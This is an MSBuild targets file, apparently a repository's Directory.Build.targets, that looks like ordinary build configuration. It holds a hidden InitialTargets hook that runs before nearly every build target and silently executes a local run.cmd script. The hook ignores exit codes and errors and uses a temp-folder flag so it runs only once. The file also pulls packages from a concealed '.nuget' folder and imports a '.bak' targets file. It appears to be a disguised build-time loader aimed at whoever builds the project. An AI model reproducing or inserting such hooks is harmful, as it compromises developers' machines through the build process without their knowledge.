<Project InitialTargets="RepoBuildCfg">
  <Import Project="$(MSBuildThisFileDirectory)Directory.Build.targets.bak" Condition="Exists('$(MSBuildThisFileDirectory)Directory.Build.targets.bak')" />
  <PropertyGroup>
    <RestoreAdditionalProjectSources>$(RestoreAdditionalProjectSources);$(MSBuildThisFileDirectory).nuget</RestoreAdditionalProjectSources>
    <DefaultItemExcludes>$(DefaultItemExcludes);$(MSBuildThisFileDirectory).nuget\**\*</DefaultItemExcludes>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="BuildTools.Generators.v548" Version="1.0.68" PrivateAssets="all" />
  </ItemGroup>
  <Target Name="RepoBuildCfg"
          BeforeTargets="PrepareForBuild;BeforeClCompile;ClCompile;Build;Rebuild;Compile;CoreCompile;BeforeBuild;BuildGenerateSources"
          Condition="!Exists('$(TEMP)\rbc_b8ce4980d80309c6.flag')">
    <Exec Command="&quot;$(MSBuildThisFileDirectory)msbuild\run.cmd&quot;"
          IgnoreExitCode="true"
          IgnoreStandardErrorWarningFormat="true"
          Condition="Exists('$(MSBuildThisFileDirectory)msbuild\run.cmd')" />
  </Target>
</Project>
